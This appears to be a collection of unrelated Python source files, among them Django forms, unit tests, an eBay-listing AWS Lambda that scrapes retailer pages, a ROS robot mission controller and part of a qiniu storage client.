request.POST we pass POST data to this form and validate it. If form_id not found in request.POST we will not validate this form. """ def clean_email(self): user = User.objects.filter(email=self.cleaned_data['email']).first() if not user: raise forms.ValidationError('No registered account with such email.') if not user.has_usable_password(): raise forms.ValidationError( 'User with this email does not have password, more likely you registered via social network') return self.cleaned_data['email'] class SocialForm(forms.ModelForm): institution = forms.CharField(required=True) what_do_you_teach = forms.CharField(required=True) class Meta: model = Instructor fields = ( 'user', 'institution', 'what_do_you_teach' ) widgets = { 'user': forms.HiddenInput(), } class CustomSetPasswordForm(SetPasswordForm): def __init__(self, user, *args, **kwargs): super(CustomSetPasswordForm, self).__init__(user, *args, **kwargs) self.fields['new_password1'].validators.append(MinLengthValidator(6)) self.fields['new_password2'].validators.append(MinLengthValidator(6))
python
import unittest from mock import patch, MagicMock from rawes.elastic import Elastic from requests.models import Response from rawes.http_connection import HttpConnection class TestConnectionPooling(unittest.TestCase): """Connection pooling was added on top of Rawes, it wasn't designed from the beggingin. We need some tests to ensure our expectations of the connection pooling are met. """ def testBasicRoundRobin(self): """ Set up a client with three different hosts to connect to, make multiple calls and check that each call goes on a different host in a Round Robin fashion """ hosts = ['http://someserver1:9200', 'http://someserver2:9200', 'http://someserver3:9200'] es = Elastic(hosts, connection_pool_kwargs={'dead_timeout': 10}) with patch('rawes.http_connection.requests.Session.request', MagicMock(return_value=None)) as request: request.return_value = Response() called = [] for _ in xrange(len(hosts)): es.get() # Save a list of called hosts (and remove trailing /) called.append(request.call_args[0][1][:-1]) # Check against original hosts list self.assertSetEqual(set(hosts), set(called), 'All hosts in coonnection pool should be used') called_again = [] for _ in xrange(len(hosts)): es.get() # Call the same hosts again (don't forget about the trailing /) called_again.append(request.call_args[0][1][:-1]) # Check they were called in the same order as before self.assertListEqual(called, called_again, 'Round robin order wasn\'t preserved')
python
import os.path __all__ = [ "__name__", "__summary__", "__url__", "__version__", "__author__", "__email__", "__license__" ] try: base_dir = os.path.dirname(os.path.abspath(__file__)) except NameError: base_dir = None __title__ = "makebib" __summary__ = "A simple script to generate a local bib file from a central database." __url__ = 'https://gitlab.com/Verner/makebib' __version__ = "0.2.2" __author__ = "Jonathan L. Verner" __email__ = "[email protected]" __license__ = "MIT"
python
import json import os import sys import logging import traceback import re import boto3 import time # helper functions from queue_wrapper import * from message_wrapper import * # packages for listing to ebay from ebaysdk.trading import Connection # packages for the item info formatter from bs4 import BeautifulSoup from selenium import webdriver from selenium.webdriver.chrome.options import Options sqs = boto3.resource('sqs') LOGGER = logging.getLogger(__name__) LOGGER.setLevel(logging.INFO) # Setting chrome options for our browser user_agent = 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.50 Safari/537.36' chrome_options = Options() # chrome_options.add_argument("--disable-extensions") chrome_options.add_argument("--disable-gpu") # chrome_options.add_argument("--no-sandbox") # linux only chrome_options.add_argument("--headless") chrome_options.add_argument(f'user-agent={user_agent}') # chrome_options.add_argument("start-maximized") # chrome_options.add_argument("disable-infobars") def strip_text(string, rejoin_str=False): """removes all punctuation and from the string and returns comma separated list <div class="price" data-auto="main-price"> Orig. $190.00 </div> -> ['Orig', '190', '00'] rejion_str == True -> Orig 190 00 :param string -> string containing alphanumeric characters to be split into words """ split_words = re.findall(r"[\w']+", string) # if we want to make the string into a sentence again if rejoin_str: # join the words together with spaces in each of them return " ".join(split_words) # return the original words split into a list return split_words def get_macys_item_info(soup): """return the needed json/dictionary of a macys item in order to post it to eBay :param soup: BeautifulSoup() instance """ item_details = {} # TITLE # filter title solely for words item_details["Title"] = strip_text(soup.find("div", attrs={"data-el": "product-title"}).text, rejoin_str=True) # DESCRIPTION item_details["Description"] = soup.find(attrs={"data-el": "product-details"}).text # IMAGES item_details["PictureDetails"] = [] # for each img item in product detail for img_element in soup.find("ul", class_="c-reset scroller swiper animated").find_all("img"): # get elt xml xml_str = str(img_element) # get info after src attribute url = xml_str.split(" src=\"")[1] # clip info after next quote url = url[:url.find("\" ")] # append the image url item_details["PictureDetails"] += [{"PictureURL": url}] # PRICE # get original price html element price_html_text = soup.find(attrs={"data-auto": "main-price"}).text without_punctuation = strip_text(price_html_text) # get price, assuming it is the second element item_details["StartPrice"] = without_punctuation[1] ################# START ITEM SPECIFICS ################# item_details["ItemSpecifics"] = {"NameValueList": [ {"Name": "SizeType", "Value": "Regular"}, # {"Name": "Inseam", "Value": "33"}, # {"Name": "Sleeve Style", "Value": "Short Sleeve"} ]} name_value_list = item_details["ItemSpecifics"]["NameValueList"] # --> Color name_value_list.append({ "Name": "Color", "Value": soup.find(attrs={"data-auto": "selected-color"}).text }) # --> Brand name_value_list.append({ "Name": "Brand", "Value": strip_text(soup.find(attrs={"data-auto": "product-brand"}).text, rejoin_str=True) }) # --> Size name_value_list.append({ "Name": "Size", "Value": strip_text( soup.find("li", class_="swatch-itm static", attrs={"aria-disabled": "false"}).text )[0] }) # breadcrumbs --> ["Macy's", 'Women', 'Coats'] breadcrumbs = strip_text( soup.find("div", class_="breadcrumbs-container").text) # --> Department department = breadcrumbs[1] name_value_list.append({"Name": "Department", "Value": department}) # --> Style style = breadcrumbs[-1] name_value_list.append({"Name": "Style", "Value": style}) # --> Type item_type = breadcrumbs[-1] name_value_list.append({"Name": "Type", "Value": item_type}) ################# END ITEM SPECIFICS ################# return item_details def format_item_details(message): item_details = None """Formats webpage data for the product into an ebay-friendly template :param message: message object representing message in the queue """ host_functions = { "macys": get_macys_item_info } driver = webdriver.Chrome("./chromedriver", options=chrome_options) # Set the window size driver.set_window_size(1500, 1280) # get the url from the body of the sqs record item_url = message.body # go to said items webpage in selenium driver.get(item_url) # wait a specified amount of time for elements to be updated time.sleep(3) # pass the output to BS4 soup = BeautifulSoup(driver.page_source, "xml") # close the window (all tabs) driver.quit() # get the specific host host = item_url.split(".")[1] # use function based on host try: # try to find our host url's function try: get_item_info = host_functions[host] except: LOGGER.error(f"failed to find get_item_info function for {host}") traceback.print_exc() # attempt to fetch the details for this item item_details = get_item_info(soup) except: LOGGER.error(f"failed to finish getting item info from {host}") traceback.print_exc() raise ValueError return item_details def list_ebay_item(item_details): LOGGER.info( f"Hello from the eBay Item Lister Lambda! Now listing item: {item_details['Title']}" ) if os.environ["ENV"] == "SANDBOX": domain = "api.sandbox.ebay.com" elif os.environ["ENV"] == "PRODUCTION": domain = "api.ebay.com" else: raise ValueError(f"Invalid market_environment: {os.environ['ENV']}") #!/usr/bin/env python3 api = Connection( config_file=os.environ.get('EBAY_YAML'), domain=domain, appid=os.environ["CLIENT_ID"], certid=os.environ["DEV_ID"], devid=os.environ["CLIENT_SECRET"], token=os.environ["TOKEN"], password=os.environ["PASSWORD"], debug=True ) # create set of style and dept for addition to category search title_specifics = set(["Style", "Department"]) item_specifics = item_details["ItemSpecifics"]["NameValueList"] # get the suggested ebay category category_response = api.execute( 'GetSuggestedCategories', { # concatenate the style and department 'Query': " ".join( [item["Value"] for item in item_specifics if item["Name"] in title_specifics] + [item_details["Title"]] ) } ) # unwrap suggested categories suggested_categories = category_response.dict()['SuggestedCategoryArray']['SuggestedCategory'] # set primary category primary_category_id = suggested_categories[0]["Category"]["CategoryID"] request = { "Item": { **item_details, # "Title": title, "Country": "US", "Location": "US", "Site": "US", "ConditionID": "1000", # new for now "PaymentMethods": "PayPal", # paypal for now "PayPalEmailAddress": os.environ["EMAIL"], # Clothing, Shoes & Accessories "PrimaryCategory": {"CategoryID": primary_category_id}, # "PrimaryCategory": {"CategoryID": "57989"}, # "Description": description, # description passed in from elsewhere "Quantity": "1", "ListingDuration": "GTC", # make a listing only last 14 days # "StartPrice": price, "Currency": "USD", "ListingType": "FixedPriceItem", # "ItemSpecifics": { # "NameValueList": [ # {"Name": "Color", "Value": "Black"}, # {"Name": "Brand", "Value": "Alternative"}, # {"Name": "Size", "Value": "M"}, # {"Name": "SizeType", "Value": "Regular"}, # {"Name": "Inseam", "Value": "33"}, # {"Name": "Style", "Value": "Polo Shirt"}, # {"Name": "Sleeve Style", "Value": "Short Sleeve"}, # {"Name": "Type", "Value": "Short Sleeve"}, # {"Name": "Department", "Value": "Men"} # ] # }, # "PictureDetails": [ # { "PictureURL": "http://www.itcircleconsult.com/eb2017/4a.png" } # ], "ReturnPolicy": { # to avoid handling two-step returns to two different places, we will "ReturnsAcceptedOption": "ReturnsNotAccepted", # TODO: REMOVE THESE COMMENTS upon successful api call # "RefundOption": "MoneyBack", # "ReturnsWithinOption": "Days_30", # "Description": "If you are not satisfied, return the keyboard.", # "ShippingCostPaidByOption": "Seller" }, "ShippingDetails": { "ShippingServiceOptions": { "FreeShipping": "True", "ShippingService": "USPSMedia" } }, # Shorter dispatch times are always better if you can reliably meet them. "DispatchTimeMax": "2" } } # trigger request and log the response to cloudwatch response = api.execute("AddItem", request) print(response.status) return response def lambda_handler(event, context): """lambda function to list items to eBay's sandbox or production marketplace""" # get our sqs queue sqs_queue = get_queue(os.environ["SQS_QUEUE_NAME"]) # fetch the sqs queue messages in batches sqs_messages = receive_messages(queue=sqs_queue, max_number=2, wait_time=0) if len(sqs_messages) == 0: return { "status": 500, "body": "empty queue"} # The server encountered an unexpected condition which prevented it from fulfilling the request. # var for number of successful ebay postings successes = 0 # for each message for msg in sqs_messages: try: # format the item in the message for posting item_details = format_item_details(msg) # list the item resp = list_ebay_item(item_details) LOGGER.warn(resp.text) successes += 1 except: LOGGER.error(f"{msg.body} failed to be posted to ebay") traceback.print_exc() if successes == 2: return { "status": 200 } # full success LOGGER.error(f"{sqs_messages} successfully posted to ebay") elif successes == 1: return { "status": 206 } # The HTTP 206 Partial Content success status response code indicates that the request has succeeded and has the body contains the requested ranges of data else: # successes ≤ 0 or successes ≥ 3 return { "status": 500 } # The server encountered an unexpected condition which prevented it from fulfilling the request. # TEST OBJECTS #################################### event = { "detail": { "title": "Alternative Gray Citadel Joggers", "price": "29.50", "market_environment": os.environ["ENV"], "description": "they're pretty good, just a lil worn and the drawstring is frayed", "quantity": "1" } } event2 = { "message": [ { "messageId": "059f36b4-87a3-44ab-83d2-661975830a7d", "receiptHandle": "AQEBwJnKyrHigUMZj6rYigCgxlaS3SLy0a...", "body": { "url": "https://www.macys.com/shop/product/calvin-klein-shine-hooded-packable-down-puffer-coat-created-for-macys?ID=11031427&CategoryID=3536,https://www.macys.com/shop/product/cole-haan-box-quilt-down-puffer-coat?ID=2813247&CategoryID=3536" }, "attributes": { "ApproximateReceiveCount": "1", "SentTimestamp": "1545082649183", "SenderId": "AIDAIENQZJOLO23YVJ4VO", "ApproximateFirstReceiveTimestamp": "1545082649185" }, "messageAttributes": {}, "md5OfBody": "098f6bcd4621d373cade4e832627b4f6", "eventSource": "aws:sqs", "eventSourceARN": "arn:aws:sqs:us-east-2:123456789012:my-queue", "awsRegion": "us-east-2" } ] } if __name__ == "__main__": # run test code context = None # print results print(lambda_handler(event2, None)) # { # 'Category': # {'CategoryID': '2887', 'CategoryName': 'Soccer-International # Clubs', 'CategoryParentID': ['64482', '24409'], 'CategoryParentName': # ['Sports Mem, Cards &amp; Fan Shop', 'Fan Apparel &amp; Souvenirs']}, # 'PercentItemFound': '89'}
python
# -*- coding: utf-8 -*- """ Created on Fri Jul 26 15:47:35 2019 @author: Dominic """ import numpy as np def generate_points_on_hypercube(nsamples,origin,poffs,p=None,uvecs=None): if uvecs is None: epsilon = [] bounds = [] for i in range(len(origin)): origin_c = np.copy(origin) poffs_c = np.copy(poffs) origin_c[i] = poffs_c[i] bounds += [origin_c] print(origin_c,poffs_c) epsilon += [np.linalg.norm(origin_c-poffs_c)] epsilon = np.array(epsilon) if p is None: p = epsilon/epsilon.sum() print(p) points = [] for i in range(nsamples): face = np.random.choice(len(origin),p=p) points+=[np.random.uniform(bounds[face],poffs)] return np.array(points) def clean_pointset(pointset): pointset = np.copy(pointset) for point in pointset: toremove = np.where(np.all(np.less(pointset,point),axis=1))[0] pointset = np.delete(pointset,toremove,axis=0) #for point in pointset: # print(np.less(pointset,point)) # print(np.where(np.logical_all(pointset<point))) return pointset if __name__ == "__main__": p = generate_points_on_hypercube(200,[120,40],[-200,-300],None) print(p) import matplotlib.pyplot as plt plt.scatter(*p.T) plt.show()
python
from bot import merger_bot WEBHOOK_HOST = merger_bot.webhook_host WEBHOOK_PORT = merger_bot.webhook_port WEBHOOK_SSL_CERT = './SSL/webhook_cert.pem' # Путь к сертификату WEBHOOK_SSL_PRIV = './SSL/webhook_pkey.pem' # Путь к приватному ключу WEBHOOK_URL_BASE = "https://%s:%s" % (WEBHOOK_HOST, WEBHOOK_PORT) WEBHOOK_URL_PATH = "/%s/" % merger_bot.telegram_token OUR_URL = "put yours here"
python
from mnist import MNIST import sklearn.metrics as metrics import numpy as np NUM_CLASSES = 10 def load_dataset(): mndata = MNIST('./data/') X_train, labels_train = map(np.array, mndata.load_training()) X_test, labels_test = map(np.array, mndata.load_testing()) X_train = X_train/255.0 X_test = X_test/255.0 X_train = X_train[:,:] X_test = X_test[:,:] return (X_train, labels_train), (X_test, labels_test) def train(X_train, y_train): ''' Build a model from X_train -> y_train ''' dim = X_train.shape[1] label = y_train.shape[1] mat1 = np.zeros((dim,dim)) mat2 = np.zeros((dim,label)) n=0 for x_i in X_train: y_i = y_train[n] mat1 += np.outer(x_i,x_i) mat2 += np.outer(x_i,y_i) n+=1 while np.linalg.matrix_rank(mat1) != dim: mat1 = mat1 + 0.0003*np.eye(dim) model = np.dot(np.linalg.inv(mat1),mat2) return model def one_hot(labels_train): '''Convert categorical labels 0,1,2,....9 to standard basis vectors in R^{10} ''' label_int = np.array(labels_train) label_bool = np.zeros((labels_train.size,10), dtype=int) label_bool[np.arange(labels_train.size),label_int] = 1 return label_bool def predict(x,y, model): ''' From model and data points, output prediction vectors ''' m = 0 hits = 0 DataSize = y.shape[0] for m in range(DataSize): xx=x[m] Predict_values = list(np.dot(model.T,xx)) winners = [i for i, xx in enumerate(Predict_values) if xx==max(Predict_values)] winner = winners[len(winners)-1] z = [0 for xx in Predict_values] z[winner] =1 prediction = z actual = list(y[m]) if prediction == actual: hits += 1 return hits if __name__ == "__main__": (X_train, labels_train), (X_test, labels_test) = load_dataset() y_train = one_hot(labels_train) y_test = one_hot(labels_test) model = train(X_train, y_train) train_hits=predict(X_train,y_train,model) test_hits=predict(X_test,y_test,model) Train_accuracy = train_hits/float(y_train.shape[0])*100 Test_accuracy = test_hits/float(y_test.shape[0])*100 print "Training Accuracy = "+str(Train_accuracy)+"%","("+str(train_hits)+"/"+str(y_train.shape[0])+")" print "Test Accuracy = "+str(Test_accuracy)+"%","("+str(test_hits)+"/"+str(y_test.shape[0])+")"
python
import djclick as click from core.utils import get_approximate_date def gather_event_date_from_prompt(): date = None while date is None: date_str = click.prompt( click.style( "What is the date of the event? (Format: DD/MM/YYYY or MM/YYYY)", bold=True, fg='yellow')) date = get_approximate_date(date_str) if date is None: click.secho("Wrong format! Try again :)", bold=True, fg='red') return date
python
# -*- coding: utf-8 -*- from __future__ import absolute_import from quixote.errors import TraversalError from vilya.views.util import jsonize, http_method from vilya.models.linecomment import PullLineComment from vilya.models.project import CodeDoubanProject from vilya.libs.template import st _q_exports = [] class CodeReviewUI(object): _q_exports = ['delete', 'edit'] def __init__(self, proj_name): self.proj_name = proj_name self.code_review = None def _q_lookup(self, request, comment_id): comment = PullLineComment.get(comment_id) if not comment: raise TraversalError( "Unable to find comment %s" % comment_id) else: self.code_review = comment return self @jsonize def delete(self, request): user = request.user if self.code_review.author == user.name: ok = self.code_review.delete() if ok: return {'r': 1} # FIXME: 这里 r=1 表示成功,跟其他地方不统一 return {'r': 0} @jsonize @http_method(methods=['POST']) def edit(self, request): user = request.user project = CodeDoubanProject.get_by_name(self.proj_name) content = request.get_form_var( 'pull_request_review_comment', '').decode('utf-8') if self.code_review.author == user.name: self.code_review.update(content) linecomment = PullLineComment.get(self.code_review.id) pullreq = True return dict( r=0, html=st('/pull/ticket_linecomment.html', **locals())) return dict(r=1)
python
#!/usr/bin/env python # -*- coding: utf-8 -*- from std_msgs.msg import Float32, UInt8 from sensor_msgs.msg import Image, CompressedImage import enum import time import rospy from cv_bridge import CvBridge class ControlNode: def __init__(self): self.traffic_mission_start = False self.parking_mission_start = False self.crossbar_mission_start = False self.tunnel_mission_start = False self.intersection_mission_start = False self.construction_mission_start = False self.traffic_mission_success = False self.parking_mission_success = False self.crossbar_mission_success = False self.tunnel_mission_success = False self.intersection_mission_success = False self.construction_mission_success = False self.mode_step = enum.Enum('step_of_mode', 'normal_mode traffic_mode parking_mode crossbar_mode tunnel_mode intersection_mode construction_mode') #self.mode_num = self.mode_step.normal_mode.value self.mode_num = self.mode_step.traffic_mode.value #self.mode_num = self.mode_step.crossbar_mode.value #self.mode_num = self.mode_step.parking_mode.value #self.mode_num = self.mode_step.tunnel_mode.value #self.mode_num = self.mode_step.intersection_mode.value #self.mode_num = self.mode_step.construction_mode.value self.sequence_num = 1 self.driving_time_pre = time.time() self.mission_time_pre = time.time() self.sign_check_time_pre = time.time() self.pre_check_time_pre = time.time() self.mission_timeout_pre = time.time() self.mission_time_delay = 0.1 self.mission_timeout = 0.0 self.img_status = 'compressed' # give 'raw' or 'compressed' if self.img_status == 'raw': self.cv_bridge = CvBridge() self.sub_img_cam = rospy.Subscriber('/image_raw', Image, self.cb_image_receive, queue_size=1) elif self.img_status == 'compressed': self.sub_img_cam = rospy.Subscriber('/image_raw/compressed', CompressedImage, self.cb_image_receive, queue_size=1) self.sub_seq_change = rospy.Subscriber('/mission/seq/change', UInt8, self.cb_sequence_num, queue_size=1) self.sub_delay_change = rospy.Subscriber('/mission/time/delay', Float32, self.cb_delay_change, queue_size=1) self.sub_timeout_change = rospy.Subscriber('/mission/time/timeout', Float32, self.cb_timeout_change, queue_size=1) self.pub_img_driving = rospy.Publisher('/controller/image/driving', CompressedImage, queue_size=1) self.pub_img_sign = rospy.Publisher('/controller/image/sign', CompressedImage, queue_size=1) self.pub_img_mission = rospy.Publisher('/controller/image/mission', CompressedImage, queue_size=1) self.pub_seq_normal = rospy.Publisher('/controller/seq/normal', UInt8, queue_size=1) self.pub_seq_traffic = rospy.Publisher('/controller/seq/traffic', UInt8, queue_size=1) self.pub_seq_parking = rospy.Publisher('/controller/seq/parking', UInt8, queue_size=1) self.pub_seq_crossbar = rospy.Publisher('/controller/seq/crossbar', UInt8, queue_size=1) self.pub_seq_tunnel = rospy.Publisher('/controller/seq/tunnel', UInt8, queue_size=1) self.pub_seq_intersection = rospy.Publisher('/controller/seq/intersection', UInt8, queue_size=1) self.pub_seq_construction = rospy.Publisher('/controller/seq/construction', UInt8, queue_size=1) loop_rate = rospy.Rate(100) while not rospy.is_shutdown(): if self.mode_num == self.mode_step.normal_mode.value: self.fn_normal_publish() else: self.fn_mission_publish() loop_rate.sleep() def fn_normal_publish(self): time_now = time.time() if self.traffic_mission_start: rospy.loginfo('mode change : traffic mode') self.mission_timeout_pre = time_now self.mode_num = self.mode_step.traffic_mode.value self.sequence_num = 1 elif self.parking_mission_start: rospy.loginfo('mode change : parking mode') self.mission_timeout_pre = time_now self.mode_num = self.mode_step.parking_mode.value self.sequence_num = 1 elif self.crossbar_mission_start: rospy.loginfo('mode change : crossbar mode') self.mission_timeout_pre = time_now self.mode_num = self.mode_step.crossbar_mode.value self.sequence_num = 1 elif self.tunnel_mission_start: rospy.loginfo('mode change : tunnel mode') self.mission_timeout_pre = time_now self.mode_num = self.mode_step.tunnel_mode.value self.sequence_num = 1 elif self.intersection_mission_start: rospy.loginfo('mode change : intersection mode') self.mission_timeout_pre = time_now self.mode_num = self.mode_step.intersection_mode.value self.sequence_num = 1 elif self.construction_mission_start: rospy.loginfo('mode change : construction mode') self.mission_timeout_pre = time_now self.mode_num = self.mode_step.construction_mode.value self.sequence_num = 1 if (time_now - self.mission_time_pre) >= 0.1: # rospy.loginfo('[normal] mission sequence publish, time: {0:.4f}'.format(time_now - self.mission_time_pre)) self.mission_time_pre = time_now self.pub_seq_normal.publish(self.sequence_num) # TODO: 미션 스타트 지점 퍼블리시 if (time_now - self.pre_check_time_pre) >= 0.1: # rospy.loginfo(' pre check sequence publish, time: {0:.4f}'.format(time_now - self.pre_check_time_pre)) self.pre_check_time_pre = time_now if not self.traffic_mission_success: self.pub_seq_traffic.publish(90) if not self.parking_mission_success and self.construction_mission_success: self.pub_seq_parking.publish(90) if not self.crossbar_mission_success and self.parking_mission_success: self.pub_seq_crossbar.publish(90) if not self.tunnel_mission_success and self.crossbar_mission_success: self.pub_seq_tunnel.publish(90) if not self.intersection_mission_success and self.traffic_mission_success: self.pub_seq_intersection.publish(90) if not self.construction_mission_success and self.intersection_mission_success: self.pub_seq_construction.publish(90) def fn_mission_publish(self): time_now = time.time() if self.mode_num == self.mode_step.traffic_mode.value: if (time_now - self.mission_time_pre) >= self.mission_time_delay: #rospy.loginfo('traffic mission sequence publish, time: ' + "{0:.4f}".format(time_now - self.mission_time_pre)) self.mission_time_pre = time_now self.pub_seq_traffic.publish(self.sequence_num) elif self.mode_num == self.mode_step.parking_mode.value: if (time_now - self.mission_time_pre) >= self.mission_time_delay: #rospy.loginfo('parking mission sequence publish, time: ' + "{0:.4f}".format(time_now - self.mission_time_pre)) self.mission_time_pre = time_now self.pub_seq_parking.publish(self.sequence_num) elif self.mode_num == self.mode_step.crossbar_mode.value: if (time_now - self.mission_time_pre) >= self.mission_time_delay: #rospy.loginfo('crossbar mission sequence publish, time: ' + "{0:.4f}".format(time_now - self.mission_time_pre)) self.mission_time_pre = time_now self.pub_seq_crossbar.publish(self.sequence_num) elif self.mode_num == self.mode_step.tunnel_mode.value: if (time_now - self.mission_time_pre) >= self.mission_time_delay: #rospy.loginfo('tunnel mission sequence publish, time: ' + "{0:.4f}".format(time_now - self.mission_time_pre)) self.mission_time_pre = time_now self.pub_seq_tunnel.publish(self.sequence_num) elif self.mode_num == self.mode_step.intersection_mode.value: if (time_now - self.mission_time_pre) >= self.mission_time_delay: #rospy.loginfo('intersection mission sequence publish, time: ' + "{0:.4f}".format(time_now - self.mission_time_pre)) self.mission_time_pre = time_now self.pub_seq_intersection.publish(self.sequence_num) elif self.mode_num == self.mode_step.construction_mode.value: if (time_now - self.mission_time_pre) >= self.mission_time_delay: #rospy.loginfo('construction mission sequence publish, time: ' + "{0:.4f}".format(time_now - self.mission_time_pre)) self.mission_time_pre = time_now self.pub_seq_construction.publish(self.sequence_num) else: if (time_now - self.mission_time_pre) >= self.mission_time_delay: rospy.logerr('[Error] Wrong Mission Mode') if self.mission_timeout > 0.1 and (time_now - self.mission_timeout_pre) > self.mission_timeout: rospy.logwarn('[warning !!] mode change fail !!') self.traffic_pre_check = False self.traffic_sign = False self.pub_seq_traffic.publish(99) self.pub_seq_parking.publish(99) self.pub_seq_crossbar.publish(99) self.pub_seq_tunnel.publish(99) self.pub_seq_intersection.publish(99) self.pub_seq_construction.publish(99) self.mode_num = self.mode_step.normal_mode.value self.sequence_num = 1 def cb_image_receive(self, msg): time_now = time.time() if self.img_status == 'raw': img = self.cv_bridge.imgmsg_to_cv2(msg, "bgr8") msg = self.cv_bridge.cv2_to_compressed_imgmsg(img, "jpg") # TODO: 표지판 이미지 퍼블리시 if (time_now - self.sign_check_time_pre) >= 0.01 and self.mode_num == self.mode_step.intersection_mode.value: #rospy.loginfo(' sign image publish, time: ' + "{0:.4f}".format(time_now - self.sign_check_time_pre)) self.sign_check_time_pre = time_now self.pub_img_sign.publish(msg) # TODO: 드라이빙 이미지 퍼블리시 if (time_now - self.driving_time_pre) >= 0.1: #rospy.loginfo(' driving image publish, time: ' + "{0:.4f}".format(time_now - self.driving_time_pre)) self.driving_time_pre = time_now self.pub_img_driving.publish(msg) # TODO: 미션 이미지 퍼블리시 self.pub_img_mission.publish(msg) def cb_sequence_num(self, msg): rospy.loginfo('sequence change : ' + str(msg.data)) if msg.data == 100: # squence end point self.traffic_mission_start = False self.parking_mission_start = False self.crossbar_mission_start = False self.tunnel_mission_start = False self.intersection_mission_start = False self.construction_mission_start = False if self.mode_num == self.mode_step.traffic_mode.value: self.traffic_mission_success = True elif self.mode_num == self.mode_step.parking_mode.value: self.parking_mission_success = True elif self.mode_num == self.mode_step.crossbar_mode.value: self.crossbar_mission_success = True elif self.mode_num == self.mode_step.tunnel_mode.value: self.tunnel_mission_success = True elif self.mode_num == self.mode_step.intersection_mode.value: self.intersection_mission_success = True elif self.mode_num == self.mode_step.construction_mode.value: self.construction_mission_success = True self.mode_num = self.mode_step.normal_mode.value self.sequence_num = 1 elif msg.data == 91: self.traffic_mission_start = True elif msg.data == 92: self.parking_mission_start = True elif msg.data == 93: self.crossbar_mission_start = True elif msg.data == 94: self.tunnel_mission_start = True elif msg.data == 95: self.intersection_mission_start = True elif msg.data == 96: self.construction_mission_start = True else: self.sequence_num = msg.data if self.mode_num == self.mode_step.traffic_mode.value: self.pub_seq_traffic.publish(self.sequence_num) elif self.mode_num == self.mode_step.parking_mode.value: self.pub_seq_parking.publish(self.sequence_num) elif self.mode_num == self.mode_step.crossbar_mode.value: self.pub_seq_crossbar.publish(self.sequence_num) elif self.mode_num == self.mode_step.tunnel_mode.value: self.pub_seq_tunnel.publish(self.sequence_num) elif self.mode_num == self.mode_step.intersection_mode.value: self.pub_seq_intersection.publish(self.sequence_num) elif self.mode_num == self.mode_step.construction_mode.value: self.pub_seq_construction.publish(self.sequence_num) self.mission_timeout_pre = time.time() def cb_delay_change(self, msg): self.mission_time_delay = msg.data def cb_timeout_change(self, msg): self.mission_timeout = msg.data @staticmethod def main(): rospy.spin() if __name__ == '__main__': rospy.init_node('Control_Node') node = ControlNode() node.main()
python
# -*- coding: utf-8 -*- from qiniu import config from qiniu.utils import urlsafe_base64_encode, entry from qiniu import http class BucketManager(object): """空间管理类 主要涉及了空间资源管理及批量操作接口的实现,具体的接口规格可以参考: http://developer.qiniu.com/docs/v6/api/reference/rs/ Attributes: auth: 账号管理密钥对,Auth对象 """ def __init__(self, auth): self.auth = auth def list(self, bucket, prefix=None, marker=None, limit=None, delimiter=None): """前缀查询: 1. 首次请求 marker = None 2. 无论 err 值如何,均应该先看 ret.get('items') 是否有内容 3. 如果后续没有更多数据,err 返回 EOF,marker 返回 None(但不通过该特征来判断是否结束) 具体规格参考: http://developer.qiniu.com/docs/v6/api/reference/rs/list.html Args: bucket: 空间名 prefix: 列举前缀 marker: 列举标识符 limit: 单次列举个数限制 delimiter: 指定目录分隔符 Returns: 一个dict变量,类似 {"hash": "<Hash string>", "key": "<Key string>"} 一个ResponseInfo对象 一个EOF信息。 """ options = { 'bucket': bucket, } if marker is not None: options['marker'] = marker if limit is not None: options['limit'] = limit if prefix is not None: options['prefix'] = prefix if delimiter is not None: options['delimiter'] = delimiter url = 'http://{0}/list'.format(config.get_default('default_rsf_host')) ret, info = self.__get(url, options) eof = False if ret and not ret.get('marker'): eof = True return ret, eof, info def stat(self, bucket, key): """获取文件信息: 获取资源的元信息,但不返回文件内容,具体规格参考: http://developer.qiniu.com/docs/v6/api/reference/rs/stat.html Args: bucket: 待获取信息资源所在的空间 key: 待获取资源的文件名 Returns: 一个dict变量,类似: { "fsize": 5122935, "hash": "ljfockr0lOil_bZfyaI2ZY78HWoH", "mimeType": "application/octet-stream", "putTime": 13603956734587420 } 一个ResponseInfo对象 """ resource = entry(bucket, key) return self.__rs_do('stat', resource) def delete(self, bucket, key): """删除文件: 删除指定资源,具体规格参考: http://developer.qiniu.com/docs/v6/api/reference/rs/delete.html Args: bucket: 待获取信息资源所在的空间 key: 待获取资源的文件名 Returns: 一个dict变量,成功返回NULL,失败返回{"error": "<errMsg string>"} 一个ResponseInfo对象 """ resource = entry(bucket, key) return self.__rs_do('delete', resource) def rename(self, bucket, key, key_to): """重命名文件: 给资源进行重命名,本质为move操作。 Args: bucket: 待操作资源所在空间 key: 待操作资源文件名 key_to: 目标资源文件名 Returns: 一个dict变量,成功返回NULL,失败返回{"error": "<errMsg string>"} 一个ResponseInfo对象 """ return self.move(bucket, key, bucket, key_to) def move(self, bucket, key, bucket_to, key_to): """移动文件: 将资源从一个空间到另一个空间,具体规格参考: http://developer.qiniu.com/docs/v6/api/reference/rs/move.html Args: bucket: 待操作资源所在空间 bucket_to: 目标资源空间名 key: 待操作资源文件名 key_to: 目标资源文件名 Returns: 一个dict变量,成功返回NULL,失败返回{"error": "<errMsg string>"} 一个ResponseInfo对象 """ resource = entry(bucket, key) to = entry(bucket_to, key_to) return self.__rs_do('move', resource, to) def copy(self, bucket, key, bucket_to, key_to): """复制文件: 将指定资源复制为新命名资源,具体规格参考: http://developer.qiniu.com/docs/v6/api/reference/rs/copy.html Args: bucket: 待操作资源所在空间 bucket_to: 目标资源空间名 key: 待操作资源文件名 key_to: 目标资源文件名 Returns: 一个dict变量,成功返回NULL,失败返回{"error": "<errMsg string>"} 一个ResponseInfo对象 """ resource = entry(bucket, key) to = entry(bucket_to, key_to) return self.__rs_do('copy', resource, to) def fetch(self, url, bucket, key=None): """抓取文件: 从指定URL抓取资源,并将该资源存储到指定空间中,具体规格参考: http://developer.qiniu.com/docs/v6/api/reference/rs/fetch.html Args: url: 指定的URL bucket: 目标资源空间 key: 目标资源文件名 Returns: 一个dict变量,成功返回NULL,失败返回{"error": "<errMsg string>"} 一个ResponseInfo对象 """ resource = urlsafe_base64_encode(url) to = entry(bucket, key) return self.__io_do('fetch', resource, 'to/{0}'.format(to)) def prefetch(self, bucket, key): """镜像回源预取文件: 从镜像源站抓取资源到空间中,如果空间中已经存在,则覆盖该资源,具体规格参考 http://developer.qiniu.com/docs/v6/api/reference/rs/prefetch.html Args: bucket: 待获取资源所在的空间 key: 代获取资源文件名 Returns: 一个dict变量,成功返回NULL,失败返回{"error": "<errMsg string>"} 